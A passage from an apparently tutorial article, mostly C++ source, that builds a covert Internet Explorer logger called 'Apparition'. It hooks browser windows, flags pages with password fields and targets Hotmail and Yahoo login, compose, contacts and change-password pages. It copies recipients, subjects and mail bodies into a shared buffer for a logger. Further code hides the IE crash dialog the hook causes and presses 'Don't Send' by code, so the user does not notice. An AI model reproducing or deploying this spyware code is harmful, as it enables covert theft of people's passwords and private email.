  return FALSE;
}

//bDelete: If COM link OK, then bDelete = TRUE
HWND PopActiveBrowser(BOOL bDelete)
{
  for(int i = 0; i < MAX_BROWSER; i++)
  {
    if(g_hActiveBrowserWnd[i] != NULL)
    {
      HWND h = g_hActiveBrowserWnd[i];
      if(bDelete) g_hActiveBrowserWnd[i] = NULL;
      return h;
    }
  }
  return NULL;
}

//Get Hooked Browser Number
DWORD WINAPI GetBrowserArrayNumber()
{
  DWORD dwRet = 0;
  for(int i = 0; i < MAX_BROWSER; i++)
  {
    if(g_hBrowserWnd[i]) dwRet++;
  }
  return dwRet;
}

//Check browser Array State
void WINAPI CheckBrowserArray()
{
  for(int i = 0; i < MAX_BROWSER; i++)
  {
    if(g_hBrowserWnd[i])
    {
      if(IsBrowser(g_hBrowserWnd[i]))
      {
        //Do Nothing
      }
      else
      {
        g_hBrowserWnd[i]      = NULL;
        g_hBrowserSendHook[i] = NULL;
        g_hBrowserPostHook[i] = NULL;
        g_idBrowserThread[i]  = 0;
      }
    }
  }
  return;
}


//Note: If You Have the Handle of The Browser, Call
//QueryBrowserHwndIndex, First Read the HTML Source, URL ...
//of the browser, Copy To MMF
BOOL WINAPI QueryDocument(DWORD dwIndex, WPARAM dwType)
{
  if(g_hBrowserWnd[dwIndex] == NULL) return FALSE;
  PostMessage(g_hBrowserWnd[dwIndex],
              WM_QUERY_BROWSER, dwType, 0);

return TRUE;
}

LRESULT WINAPI GetMsgProc(int nCode, WPARAM wParam, LPARAM lParam)
{
  MSG* msg = (MSG*)lParam;
  //The First Time Browser or Browser's (Same Thread)
  //Window Got Called
  //Link Browser with Event Class,
  //if Link to COM is OK, remove it from Active Array
  if(PopActiveBrowser(FALSE) != NULL)
  {
    HWND hWnd = msg->hwnd;

    DWORD tid     = GetWindowThreadProcessId(hWnd, NULL);
    DWORD dwIndex = QueryBrowserHwndIndex(PopActiveBrowser(FALSE));
    if(dwIndex != (DWORD)-1 && tid == ::g_idBrowserThread[dwIndex])
    {
      HWND h = PopActiveBrowser(TRUE);
      //inside it, more messages cause a re-entry
      LinkCom(dwIndex);
    }
  }

  //wParam : WM_WPARAM_QUERY_HTML, lParam : not used
  if(msg->message == WM_QUERY_BROWSER)
  {
    for(int i = 0; i < MAX_BROWSER; i++)
    {
      if(msg->hwnd == ::g_hBrowserWnd[i] &&
         msg->hwnd != NULL)
      {
        if(g_lpHTMLDocument2[i] == NULL)
          ::LinkCom(i);
        //get COM document pointer OK
        if(g_lpHTMLDocument2[i] != NULL)
        {
          InterQueryDocument(i, msg->wParam);
        }
      }
    }
  }

  //find the hook index
  HWND hWnd     = msg->hwnd;
  DWORD dwIndex = (DWORD)-1;
  DWORD tid     = GetWindowThreadProcessId(hWnd, NULL);

  for(int i = 0; i < MAX_BROWSER; i++)
  {
    if(tid == ::g_idBrowserThread[i])
    {
      dwIndex = i;
      break;
    }
  }
  //no slot matched: dwIndex still holds its initial (DWORD)-1,
  //so it must not be used as an array index
  if(dwIndex == (DWORD)-1)    //error ???
    return 0;
  return(CallNextHookEx(g_hBrowserPostHook[dwIndex],
                        nCode, wParam, lParam));
}

//SendMessage Hook Proc
LRESULT CALLBACK CallWndProc(
  int nCode,       // hook code
  // If sent by the current thread, it is nonzero; otherwise,
  // it is zero.
  WPARAM wParam,
  LPARAM lParam    // message data
)
{
  CWPSTRUCT * pCwp = (CWPSTRUCT *)lParam;

  //find the hook index ....

  //wParam : WM_WPARAM_CHECK_ISPWD, lParam : not used
  if(pCwp->message == WM_QUERY_BROWSER)
  {
    for(int i = 0; i < MAX_BROWSER; i++)
    {
      if(pCwp->hwnd == ::g_hBrowserWnd[i] &&
         pCwp->hwnd != NULL)
      {
        if(g_lpHTMLDocument2[i] == NULL)
          ::LinkCom(i);

        if(g_lpHTMLDocument2[i] != NULL)
        {
          if(pCwp->wParam == WM_WPARAM_CHECK_ISPWD)
          {
            BOOL b   = InterIsPwdBrowser(i);
            DWORD dw = WM_WPARAM_CHECK_ISPWD;
            if(b)
              g_dwBrowserState[i] |= dw;
            else
              g_dwBrowserState[i] &= ~dw;

            return 0;    //no need passing to hook chain
          }
          else if(pCwp->wParam == WM_WPARAM_CHECK_ISPREDEF)
          {
            //check URL to see whether we are interested in this
            enumPreDefinePage b = InterIsPreDefBrowser(i);
            DWORD dw = WM_WPARAM_CHECK_ISPREDEF;
            if(b != none)
              g_dwBrowserState[i] |= dw;
            else
              g_dwBrowserState[i] &= ~dw;

            return 0;
          }
        }
      }
    }
  }

  return CallNextHookEx (g_hBrowserSendHook[dwIndex],
                         nCode, wParam, lParam) ;
}


//exposed to users, get whole HTML data
BOOL InterQueryDocument(DWORD dwIndex, WPARAM dwType)
{

if(g_lpHTMLDocument2[dwIndex] == NULL)

{
  LinkCom(dwIndex);

if(g_lpHTMLDocument2[dwIndex] == NULL) return FALSE;

}
  LPVOID pView = NULL;

HANDLE hMMF = OpenFileMapping(FILE_MAP_READ |
                              FILE_MAP_WRITE, FALSE, g_MMF_NAME);

if (hMMF == NULL) err-handler;

HANDLE hWriteEvent = ::OpenEvent(EVENT_ALL_ACCESS,
                                 FALSE,g_WRITE_EVENT_MMF_NAME);
if(hWriteEvent == NULL) err-handler;

HANDLE hReadEvent = ::OpenEvent(EVENT_ALL_ACCESS,
                                FALSE,g_READ_EVENT_MMF_NAME);
if(hReadEvent == NULL) err-handler;
  DWORD dwRet = ::WaitForSingleObject(hWriteEvent, MAX_WAIT);
if(dwRet == WAIT_ABANDONED) err;

else if(dwRet == WAIT_TIMEOUT) err;

::ResetEvent(hWriteEvent);

  //4 Byte Total size 4 byte Used size
  DWORD pos = 0;
  pView = MapViewOfFile(hMMF, FILE_MAP_READ |
                        FILE_MAP_WRITE, 0, 0, 0);
  if(pView == NULL) err;

  LPBYTE lpByte = (LPBYTE)pView;
  DWORD dwSize, dwUsed;

::CopyMemory(&dwSize, lpByte, sizeof(DWORD));
                          lpByte += sizeof(DWORD);

::CopyMemory(&dwUsed, lpByte, sizeof(DWORD));
                          lpByte += sizeof(DWORD);

  LPVOID lpMem = (LPVOID)lpByte;    //Actual Data Head
  if(dwType == WM_WPARAM_QUERY_HTML)

{
  MSHTML::IHTMLElementPtr spHtmlElement;
  HRESULT hr = g_lpHTMLDocument2[dwIndex]->
  get_body(&spHtmlElement);
if(spHtmlElement != 0)

{
  BSTR bstr;
  hr = spHtmlElement->get_outerHTML(&bstr);
  UINT len = ::SysStringLen(bstr);
  //We use Unicode here, so I cast directly
  lpByte = (LPBYTE)lpMem;
  lpByte += dwUsed;

::CopyMemory(lpByte, (LPVOID)(LPCWSTR)bstr,
             len*sizeof(TCHAR));
             dwUsed += len*sizeof(TCHAR);

::SysFreeString(bstr);    //Free It!!!!
  lpByte = (LPBYTE)lpMem;
  lpByte += dwUsed;

::CopyMemory(lpByte, (LPVOID)(LPCWSTR)_T("\r\n"),
  ::lstrlen(_T("\r\n"))*sizeof(TCHAR));
  dwUsed += ::lstrlen(_T("\r\n"))*sizeof(TCHAR);

}

}

else if(dwType == WM_WPARAM_QUERY_URL)

{
  BSTR bstr;
  HRESULT hr = g_lpHTMLDocument2[dwIndex]->
  get_url(&bstr);
  //We use Unicode here
  UINT len = ::SysStringLen(bstr);
  lpByte = (LPBYTE)lpMem;
  lpByte += dwUsed;

::CopyMemory(lpByte, (LPVOID)(LPCWSTR)bstr,
  len*sizeof(TCHAR));
  dwUsed += len*sizeof(TCHAR);

::SysFreeString(bstr);
  lpByte = (LPBYTE)lpMem;
  lpByte += dwUsed;

::CopyMemory(lpByte, (LPVOID)(LPCWSTR)_T("\r\n"),
  ::lstrlen(_T("\r\n"))*sizeof(TCHAR));
  dwUsed += ::lstrlen(_T("\r\n"))*sizeof(TCHAR);

}
  lpByte = (LPBYTE)pView;
  lpByte += sizeof(DWORD);

::CopyMemory(lpByte, &dwUsed, sizeof(DWORD));

::UnmapViewOfFile(pView);

::CloseHandle(hMMF);

::CloseHandle(hWriteEvent);

::SetEvent(hReadEvent);

::CloseHandle(hReadEvent);

return TRUE;
}

//from tlb
//struct __declspec(uuid("626fc520-a41e-11cf-a731-00a0c9082637"))
///* dual interface */ IHTMLDocument;
//struct __declspec(uuid("332c4425-26cb-11d0-b483-00c04fd90119"))
///* dual interface */ IHTMLDocument2;

//Link Handle With IHTMLDocument2, Event
BOOL LinkCom(DWORD dwIndex)
{
  if(g_hBrowserWnd[dwIndex] == NULL) return FALSE;
  AntiLinkCom(dwIndex);

  CoInitialize( NULL );
  // Explicitly load MSAA so we know if it's installed
  HINSTANCE hInst = ::LoadLibrary( _T("OLEACC.DLL") );
  if(hInst == NULL ) return FALSE;

  MSHTML::IHTMLDocument2Ptr spHtmlDocument;
  LRESULT lRes;

  UINT nMsg =  ::RegisterWindowMessage( _T("WM_HTML_GETOBJECT") );
  //Time Out: 1 Second

::SendMessageTimeout( g_hBrowserWnd[dwIndex], nMsg,
                      0L, 0L, SMTO_ABORTIFHUNG, 1000,
                      (DWORD*)&lRes );

  LPFNOBJECTFROMLRESULT pfObjectFromLresult =
                        (LPFNOBJECTFROMLRESULT)
  ::GetProcAddress( hInst, "ObjectFromLresult");

if ( pfObjectFromLresult == NULL )

{

::FreeLibrary( hInst );
  CoUninitialize();

return FALSE;

}

  WCHAR strDoc[] = L"{626fc520-a41e-11cf-a731-00a0c9082637}";
  CLSID uuidDoc;
  HRESULT hrDoc = CLSIDFromString((LPOLESTR)strDoc,

&uuidDoc     //IID_IHTMLDocument2

);
  if(FAILED(hrDoc)) err;
  HRESULT hr;

hr = (*pfObjectFromLresult)( lRes, uuidDoc,
  //IID_IHTMLDocument2,
0, (void**)&spHtmlDocument );

if ( SUCCEEDED(hr) )

{

g_lpHTMLDocument2[dwIndex] = (spHtmlDocument);
  CComQIPtr<IServiceProvider> isp = spHtmlDocument;

hr = isp->QueryService(IID_IWebBrowserApp,
                         IID_IWebBrowser2,
                         (void**)&g_lpWeb2[dwIndex]);
  if(FAILED(hr))

{
  g_lpHTMLDocument2[dwIndex].Release();    //not use ->
  g_lpHTMLDocument2[dwIndex] = NULL;
  g_lpWeb2[dwIndex]          = NULL;

::FreeLibrary( hInst );
  CoUninitialize();

return FALSE;

}

else

{
  g_event.SetSource(g_lpWeb2[dwIndex] ,dwIndex);
  g_event.ConnectEvents(dwIndex);
}

}

else

{

::FreeLibrary( hInst );
  CoUninitialize();

return FALSE;

}


::FreeLibrary( hInst );
  CoUninitialize();

return TRUE;
}

BOOL AntiLinkCom(DWORD dwIndex)
{

if(g_lpHTMLDocument2[dwIndex] != NULL)

{
  g_lpHTMLDocument2[dwIndex].Release();    // not use ->
  g_lpHTMLDocument2[dwIndex] = NULL;
}
  g_event.ExitEvents(dwIndex);

if(g_lpWeb2[dwIndex] != NULL)

{
g_lpWeb2[dwIndex].Release();    //NOTE: not use ->
g_lpWeb2[dwIndex] = NULL;
}

return TRUE;
}

//Inside the HTML, there is a Password Field
BOOL WINAPI IsPwdBrowser(DWORD dwIndex)
{
if(g_hBrowserWnd[dwIndex] == NULL) return FALSE;
  LRESULT hr = ::SendMessage(g_hBrowserWnd[dwIndex],
                             WM_QUERY_BROWSER,
                             WM_WPARAM_CHECK_ISPWD,dwIndex);
if(hr != 0)
return TRUE;

return FALSE;
}

BOOL InterIsPwdBrowser(DWORD dwIndex)
{

if(g_lpHTMLDocument2[dwIndex] == NULL)

{
  if(!LinkCom(dwIndex)) return FALSE;
}

  MSHTML::IHTMLElementCollection *pForm;
  HRESULT hr = g_lpHTMLDocument2[dwIndex]->
  get_all(&pForm);
  if(FAILED(hr)) return FALSE;

long len;

hr = pForm->get_length(&len);
if(FAILED(hr)) return FALSE;
for(int i = 0; i < len; i++)

{
  LPDISPATCH lpItem = pForm->
  item(CComVariant(i), CComVariant(i));    //Atlbase.h

  MSHTML::IHTMLInputElementPtr lpInput;
  HRESULT hr = lpItem->QueryInterface(&lpInput);
  if(FAILED(hr)) continue;


_bstr_t type(_T("password"));
  if(lpInput->Gettype() == type)

{
  pForm->Release();
  pForm = NULL;
  return TRUE;
}

}
  pForm->Release();
  pForm = NULL;

return FALSE;
}

//Some pre-defined site, such as the following
BOOL WINAPI IsPreDefBrowser(DWORD dwIndex)
{
  if(g_hBrowserWnd[dwIndex] == NULL) return FALSE;
  HRESULT hr = ::SendMessage(g_hBrowserWnd[dwIndex],
                             WM_QUERY_BROWSER,
                             WM_WPARAM_CHECK_ISPREDEF,dwIndex);
  if(hr != 0)
return TRUE;

return FALSE;
}

enumPreDefinePage InterIsPreDefBrowser(DWORD dwIndex)
{

if(g_lpHTMLDocument2[dwIndex] == NULL)

{
  if(!LinkCom(dwIndex)) return none;

}
  BSTR bstr;
  HRESULT hr = g_lpHTMLDocument2[dwIndex]->get_url(&bstr);

  //We use Unicode here
  UINT len = ::SysStringLen(bstr);
  int dim = sizeof(szTargetUrl)/sizeof(szTargetUrl[0]);
  enumPreDefinePage bRet = none;
  for(int i = 0; i < dim; i++)

{
  //URL wildcard comparison
  if(::WildCompare((LPTSTR)(LPCTSTR)bstr, len,
                   (LPCTSTR)szTargetUrl[i]) != -1)

{
  bRet = (enumPreDefinePage)i;

break;

}

}

::SysFreeString(bstr);

return bRet;
}

DWORD WINAPI QueryBrowserState(DWORD dwIndex)
{

return g_dwBrowserState[dwIndex];
}

BOOL Trigger(DWORD dwIndex)
{
  //Decide Detail Type of the Current Homepage and
  //Parse its Html to MMF
  enumPreDefinePage type = InterIsPreDefBrowser(dwIndex);
  if(type != none || InterIsPwdBrowser(dwIndex))

{
  //Open MMF

HANDLE hMMF, hWriteEvent, hReadEvent;
  LPVOID pView = NULL;

  hMMF = OpenFileMapping(FILE_MAP_READ |
                         FILE_MAP_WRITE,
                         FALSE, g_MMF_NAME);

if (hMMF == NULL) err;
  hWriteEvent = ::OpenEvent(EVENT_ALL_ACCESS,
                            FALSE,g_WRITE_EVENT_MMF_NAME);
if(hWriteEvent == NULL) err;
  hReadEvent = ::OpenEvent(EVENT_ALL_ACCESS,
                           FALSE,g_READ_EVENT_MMF_NAME);
if(hReadEvent == NULL) err;

  DWORD dwRet = ::WaitForSingleObject(hWriteEvent, MAX_WAIT);
  if(dwRet == WAIT_ABANDONED) err;

else if(dwRet == WAIT_TIMEOUT) err;

::ResetEvent(hWriteEvent);

  //4 Byte Total size
  //4 byte Used size
  DWORD pos = 0;
  //head 4 byte to record size
  pView = MapViewOfFile(hMMF,
                        FILE_MAP_READ | FILE_MAP_WRITE, 0, 0, 0);
  if(pView == NULL) err;

  LPBYTE lpByte = (LPBYTE)pView;
  DWORD dwSize, dwUsed, dwInfo;

::CopyMemory(&dwSize, lpByte, sizeof(DWORD));
  lpByte += sizeof(DWORD);

::CopyMemory(&dwUsed, lpByte, sizeof(DWORD));
  lpByte += sizeof(DWORD);

  LPBYTE lpMem = (LPBYTE)lpByte;    //Actual Data Head
  //================ gg
  switch(type)

{

case hotmailInbox:

HandleHotmailInbox(g_lpHTMLDocument2[dwIndex],
  lpMem, dwSize, dwUsed, dwInfo);

break;

case hotmailCompose:

HandleHotmailCompose(g_lpHTMLDocument2[dwIndex],
  lpMem, dwSize, dwUsed, dwInfo);

break;

case hotmailLogin:

HandleHotmailLogIn(g_lpHTMLDocument2[dwIndex],
                   lpMem, dwSize, dwUsed, dwInfo);

break;
  //.......
  //hotmailLogError, hotmailContacts, hotmailChangePassword,
  //hotmailChangeAnswer, hotmailForgotPassword,
  //hotmailReadMail, yahooInbox, yahooCompose, yahooLogin,
  //yahooLogError, yahooContacts, yahooChangePassword.....

default:    //password page

HandlePasswordPage(g_lpHTMLDocument2[dwIndex],
                   lpMem, dwSize, dwUsed, dwInfo);

break;

}
  //close MMF, mark read OK...

}

else

return FALSE;

return TRUE;
}
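
The listings above repeatedly read an 8-byte header ("4 Byte Total size, 4 byte Used size") from the shared block and then copy data behind it, but they never compare the new length against the total size. As a minimal sketch only, the append step could be bounds-checked like this. AppendRecord and ReadUsed are hypothetical helper names, not part of the original source, and the sketch assumes the "total size" field holds the payload capacity (excluding the header), which the article does not state.

```cpp
#include <cassert>
#include <cstdint>
#include <cstring>

// Assumed layout of the shared block (see the comment in the listing):
//   [uint32 total payload capacity][uint32 bytes used][payload ...]
static const std::size_t kHeaderSize = 2 * sizeof(std::uint32_t);

// Hypothetical helper: read the "used" field from the header.
std::uint32_t ReadUsed(const std::uint8_t* view)
{
    std::uint32_t used = 0;
    std::memcpy(&used, view + sizeof(std::uint32_t), sizeof used);
    return used;
}

// Hypothetical helper: append len bytes behind the data already stored.
// Returns false and leaves the block untouched if the data does not fit.
bool AppendRecord(std::uint8_t* view, const void* data, std::uint32_t len)
{
    std::uint32_t total = 0;
    std::memcpy(&total, view, sizeof total);
    std::uint32_t used = ReadUsed(view);

    // Reject a corrupt header and any write that would overflow.
    if (used > total || len > total - used)
        return false;

    std::memcpy(view + kHeaderSize + used, data, len);
    used += len;
    std::memcpy(view + sizeof(std::uint32_t), &used, sizeof used);
    return true;
}
```

Writing the "used" field only after a successful copy keeps the header consistent even when an append is refused.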

An interesting Brain Exercise—Parse Online Page:

Let’s see how to accomplish Step 7b: parsing a page written by someone else. Take Hotmail’s Compose page as a sample. For your convenience, here is a screen shot of it.

Figure 3.7: Screen Shot of Hotmail Compose Page

So, what are the key points on this page? I think all of you can guess them: To, CC, BCC, Subject, and Mail Body. I highly suggest you explore this page with the HtmlPeek program that I enclosed with this program. Enter www.hotmail.com in the edit area on the toolbar, click the navigate button, log in using your account, and click the magnifying glass-like button to dump the HTML elements. You will get a result in the right view similar to this:

RS $$$ hidden $$$ CHECKED
Form $$$ hidden $$$ HM
cp $$$ hidden $$$ 1252
v $$$ hidden $$$ 1
q $$$ text $$$
 $$$ image $$$
sigtext $$$ hidden $$$
replytext $$$ hidden $$$
drafttext $$$ hidden $$$
curmbox $$$ hidden $$$ F000000001
_HMaction $$$ hidden $$$
subaction $$$ hidden $$$
plaintext $$$ hidden $$$
login $$$ hidden $$$ codetiger
wcid $$$ hidden $$$
soid $$$ hidden $$$
msg $$$ hidden $$$
start $$$ hidden $$$
len $$$ hidden $$$
attfile $$$ hidden $$$
type $$$ hidden $$$
src $$$ hidden $$$
ref $$$ hidden $$$
ru $$$ hidden $$$
wysiwyg $$$ hidden $$$
msghdrid $$$ hidden $$$ 931fb080ed04531ce1bca7ac9f2f61f4_1039376788
RTEbgcolor $$$ hidden $$$
sigflag $$$ hidden $$$
newmail $$$ hidden $$$ new
to $$$ text $$$
$mostContactPerson1 $$$ hidden $$$ people1@abc.com
$mostContactPerson2 $$$ hidden $$$ people2@abc.com
$mostContactPerson3 $$$ hidden $$$ people3@abc.com
Quick.x $$$ button $$$ Show All
COMPOSE_X $$$ button $$$ Edit List
cc $$$ text $$$
bcc $$$ text $$$
subject $$$ text $$$
Attach.x $$$ submit $$$ Add/Edit Attachments
<SELECT class=drpdwn title="Tools for composing messages" onchange=DT(this[selectedIndex].value)
name=tools> <OPTION value="" selected>Tools<OPTION value=SpellChk>Spell
Check<OPTION value=Dictionary>Dictionary<OPTION
value=Thesaurus>Thesaurus<OPTION value=RTE>Rich-Text Editor
ON</OPTION></SELECT>
outgoing $$$ checkbox $$$ on
Send.x $$$ submit $$$ Send
Save.x $$$ submit $$$ Save Draft
Cancel.x $$$ submit $$$ Cancel
body $$$ textarea $$$

Send.x $$$ submit $$$ Send
Save.x $$$ submit $$$ Save Draft
Cancel.x $$$ submit $$$ Cancel

Figure 3.8: Page Element Layout of Hotmail Compose Page

Make sense? What we need to do is get these five elements and their values and write them to the logger. This may be more important than you estimated at first. Usually, the “Compose New Mail” page of Hotmail itself is 25-32 KB even if you write nothing in it, while people usually write only a few kilobytes of text in the mail body, say, 5 KB. If you dump the HTML without processing (filtering) it, after sending 10 online mails your data will be approximately (5 + 25~32) KB * 10 = 300~370 KB versus our cute 5 KB * 10 = 50 KB. This filtering alone saves a lot of network traffic in the real world.
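
The size estimate above is simple arithmetic, and it can be checked with a few lines of code. This is only a sketch: TrafficEstimate and EstimateTraffic are names made up for this illustration, and the figures passed in are the rough ones quoted in the text, not measurements.

```cpp
#include <cassert>

// Hypothetical helper type for this illustration only.
struct TrafficEstimate {
    int rawMinKb;    // whole pages dumped, smallest page size
    int rawMaxKb;    // whole pages dumped, largest page size
    int filteredKb;  // only the mail bodies kept
};

// mails:     number of mails sent
// bodyKb:    text typed per mail, in KB
// pageMinKb: smallest size of the empty Compose page, in KB
// pageMaxKb: largest size of the empty Compose page, in KB
TrafficEstimate EstimateTraffic(int mails, int bodyKb,
                                int pageMinKb, int pageMaxKb)
{
    TrafficEstimate e;
    e.rawMinKb   = (bodyKb + pageMinKb) * mails;
    e.rawMaxKb   = (bodyKb + pageMaxKb) * mails;
    e.filteredKb = bodyKb * mails;
    return e;
}
```

With the numbers from the paragraph, EstimateTraffic(10, 5, 25, 32) gives 300 to 370 KB for unfiltered dumps against 50 KB for filtered output.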

Here is the code:

BOOL HandleHotmailComposePage(
     MSHTML::IHTMLDocument2Ptr pDoc, LPBYTE lpMem,
     DWORD& dwSize, DWORD& dwUsed,
     DWORD& dwInfo)
{
  //lpMem is the starting pointer of our MMF
  LPBYTE lpByte = lpMem;
  lpByte += dwUsed;

  //Write System Time
  SYSTEMTIME tm;
  ::GetLocalTime(&tm);
  TCHAR sz[256];    //seems enough
  _stprintf(sz, _T("\r\n>>>>>Hotmail Compose Page ")
            _T("%d/%d/%d,%d:%d:%d\r\n"),  tm.wYear, tm.wMonth,
            tm.wDay, tm.wHour, tm.wMinute, tm.wSecond);
  DWORD dwDisp = ::lstrlen(sz)*sizeof(TCHAR);
  ::CopyMemory(lpByte, sz, dwDisp);
  dwUsed += dwDisp;

  MSHTML::IHTMLElementCollection *pCollection;
  HRESULT hr = pDoc->get_all(&pCollection);
  if(FAILED(hr)) return FALSE;
  long len;
  hr = pCollection->get_length(&len);
  if(FAILED(hr)) return FALSE;

  for(int i = 0; i < len; i++)
  {LPDISPATCH lpItem = pCollection->item(CComVariant(i),
                                            CComVariant(i));
  //Parse INPUT and TEXTAREA
  //We need INPUT: to, cc, bcc, subject
  // TEXTAREA: body
  MSHTML::IHTMLInputElementPtr lpElement;
  HRESULT hr = lpItem->QueryInterface(&lpElement);
  if(SUCCEEDED(hr))
  {
  _bstr_t name = lpElement->Getname();
  _bstr_t type = lpElement->Gettype();
  _bstr_t value = lpElement->Getvalue();

  _bstr_t text(_T("text"));
  _bstr_t to(_T("to"));
  _bstr_t cc(_T("cc"));
  _bstr_t bcc(_T("bcc"));
  _bstr_t subject(_T("subject"));
    if(type == text)

{
  if(name == to || name == cc ||
     name == bcc || name == subject)
   HandlePageElement(lpMem, dwSize,
                     dwUsed, (LPCTSTR)type,
                     (LPCTSTR)name,(LPCTSTR)value);
}
}

  //Parse TextArea
  MSHTML::IHTMLTextAreaElementPtr lpArea;
  hr = lpItem->QueryInterface(&lpArea);
  if(SUCCEEDED(hr))
  {
    _bstr_t name = lpArea->Getname();
    _bstr_t type = lpArea->Gettype();
    _bstr_t value = lpArea->Getvalue();
    _bstr_t textarea(_T("textarea"));
    _bstr_t body(_T("body"));
      if(type == textarea && name == body)

{
  HandlePageElement(lpMem, dwSize, dwUsed,
  (LPCTSTR)type, (LPCTSTR)name,(LPCTSTR)value);
}

}

  }    //end for loop
  pCollection->Release();
  pCollection = NULL;
  return TRUE;
}

Game Not Over Yet

When I started to write this series this summer, I took my former logger EXE and launched it directly, but found it did not work correctly on online pages. At first I thought my code was outdated for today’s IE. After inserting a few message boxes in the DLL, I realized that MSN had reorganized their URL layout some time earlier this year. For example, the Inbox page of Hotmail (the page listing the mail in the Inbox) used to be “http://*.hotmail.msn.com/cgi-bin/getmsg*”, while now it is “http://*.hotmail.msn.com/cgi-bin/HoTMaiL?curmbox=*”. I am very glad that the HTML element layout inside each page did not change much, so I updated the code in one weekend morning. You can experiment with my program by launching it first, then launching IE, logging in to Hotmail using your account information, viewing incoming messages, composing and sending a message, viewing your contact list, and changing your password and secret answer. Now, have a look at my “Apparition.”

Figure 3.9: Screen Shot of “Apparition” showing a user reading Hotmail
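
The URL patterns quoted above use “*” as a wildcard. The WildCompare routine called in the earlier listing is not shown in this article, so the following is only a stand-in sketch of how such a comparison can work. WildMatch is a hypothetical name, it supports “*” only, it is case-sensitive, and it returns a bool rather than the index that WildCompare appears to return.

```cpp
#include <cassert>
#include <string>

// Hypothetical stand-in for a wildcard comparison: '*' matches any run of
// characters (including none); every other character must match exactly.
bool WildMatch(const std::string& pattern, const std::string& text)
{
    std::size_t p = 0, t = 0;
    std::size_t starP = std::string::npos;  // position of the last '*' seen
    std::size_t starT = 0;                  // text position tried for that '*'

    while (t < text.size()) {
        if (p < pattern.size() && pattern[p] == '*') {
            starP = p++;      // remember the star, first try matching nothing
            starT = t;
        } else if (p < pattern.size() && pattern[p] == text[t]) {
            ++p;
            ++t;
        } else if (starP != std::string::npos) {
            p = starP + 1;    // backtrack: let the star absorb one more char
            t = ++starT;
        } else {
            return false;
        }
    }
    // Only trailing stars may remain in the pattern.
    while (p < pattern.size() && pattern[p] == '*')
        ++p;
    return p == pattern.size();
}
```

For a made-up address such as “http://mail1.hotmail.msn.com/cgi-bin/getmsg?id=1”, the old pattern matches and the new one does not, which is exactly the kind of mismatch described above.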

But another on-line mail system, Yahoo!, is really a headache, just as I mentioned above. The individual local Yahoo! sites developed their page layouts completely differently. So, if you really want to make an omnipotent Yahoo! mail program, you have to check all the Yahoo! branch companies (maybe two dozen of them around the world) and write handler code for each of them, which is pure programming labor. My program only deals with www.yahoo.com (so not www.yahoo.co.jo, www.tw.yahoo.com, www.sg.yahoo.com, etc. Just see their inconsistent names!). Do not ask me for more handlers, because you already have enough information to make a new handler yourself.

Something Not Finished

I have to admit that sometimes (not all the time, which makes the bug even harder to locate), after this logger has been launched, IE tends to crash when you CLOSE it. For IE6 users, it looks like this:

Figure 3.10: IE 6.0 crash caused by “Apparition.” The command line is “dw15 -x -s 340” (from Process Explorer), while the process name from ToolHelp is “_dw15.exe”!!??

Strangely, you always get the same IHTMLDocument2 pointer when you use it in your own dialog or Form View-based application, but caching this kind of pointer in the shared section of a DLL (injected into a remote IE) is a painstaking job. From time to time, I found that this pointer had mutated into a plain IDispatch, and asking it for IHTMLDocument2 returned NULL accordingly. MSDN KB Q249232, “HOWTO: Get IHTMLDocument2 from a HWND”, says that you get a fully marshaled IHTMLDocument2 pointer from the window handle, and the sample code in that KB article runs well because the pointer is used just once. Our logger should avoid the “GP Error” dialog as much as possible.

Oh, BTW, the crash-helper dialog actually resides in “DW15.exe”, an EXE in the same place as “IExplore.exe”. You can verify this by opening your “C:\Program Files\Internet Explorer” folder. I recommend you open this EXE with the “Resource Hacker” tool I listed in the References section. You will see that the MS IE team guys use this dialog template to give the user several choices before the troublesome IE process REALLY exits.

Figure 3.11: Dialog Template Resource inside DW15.exe (Peeked by “Resource Hacker”)

The ultimate solution to this crash bug is NOT available yet. Up to now I have used an indirect, brute-force way: hide the crash dialog from the user and push the “Don’t Send” button by code. You can refer to this article: Automated IE SaveAs MHTML (http://www.codeproject.com/shell/iesaveas.asp) by Stephane Rodriguez. Anyway, if any eagle eyes can find the mysterious reason for the crash, that will be much better. Oh, I almost forgot: although every folder window opened in Windows includes an “Internet Explorer_Server” window (inside which a list view resides), folder windows are much less troublesome than IE, so handling the IE crash dialog DOES make sense!

Refer to the following figure:

Figure 3.12: Windows Layout of IE Crash Dialog

We handle HCBT_ACTIVATE instead of HCBT_CREATEWND this time because I found that the RichEdit20W child is not ready yet when HCBT_CREATEWND runs. We hide the dialog or move it off the screen, uncheck “Restart Microsoft Internet Explorer”, and then use the “Don’t Send” button to mimic the user ending the dialog.

The code is very short, so I list it here:

LRESULT CALLBACK CBTProc(
int nCode,        // hook code
WPARAM wParam,    // depends on hook code
LPARAM lParam     // depends on hook code
)
{
  if(nCode == HCBT_ACTIVATE)
  {
    if(IsIECrashDialog((HWND)wParam))
    {
      HandleIECrashDialog((HWND)wParam);
    }
  }
  ..............

BOOL IsIECrashDialog(HWND hWnd)
{
  TCHAR szClassName[64];
  int nRet = GetClassName(hWnd, szClassName, 64);
  if(nRet == 0) return FALSE;
  szClassName[nRet] = 0;
   //Dialog's Class Name is "#32770"
  if(::lstrcmpi(szClassName, _T("#32770")) != 0)
    return FALSE;
  //hWnd is a dialog
  //have 4 buttons (including 1 check box) and a RichEdit20W
  HWND hRich = ::FindWindowEx(hWnd, NULL,
                              _T("RichEdit20W"), NULL);
  if(!hRich) return FALSE;
  HWND hButton = ::FindWindowEx(hWnd, NULL,
                                _T("Button"), NULL);
  if(!hButton) return FALSE;
  //HWND-->ProcessID-->Exe name
  DWORD dwPID;
  GetWindowThreadProcessId(hWnd, &dwPID);
  CToolhelp th(TH32CS_SNAPALL, dwPID);
  // Show Process details
  PROCESSENTRY32 pe = { sizeof(pe) };
  BOOL fOk = th.ProcessFirst(&pe);
  for (; fOk; fOk = th.ProcessNext(&pe))
  {
    if (pe.th32ProcessID == dwPID)
    {
      //Zhefu Zhang does not understand why it is _DW15.exe
      //instead of DW15.exe (exe file name)
      if(::lstrcmpi(pe.szExeFile, _T("_DW15.exe")) == 0)
        return TRUE;
      else
         return FALSE;
      break;    // No need to continue looping
    }
   }
  return FALSE;
}

BOOL HandleIECrashDialog(HWND hWnd)
{
  //::ShowWindow(hWnd, SW_HIDE);
  //::MoveWindow(hWnd, -2000, 0, 100, 100, FALSE);
  //Find Check Button, UnCheck It
  HWND hChild = ::FindWindowEx(hWnd, NULL,
                               _T("Button"), NULL);
  while(hChild)
  {
    //Check Box?
    LONG_PTR lStyle = ::GetWindowLongPtr(hChild,
                                         GWL_STYLE);
    if((BS_CHECKBOX & lStyle) == BS_CHECKBOX)
    {
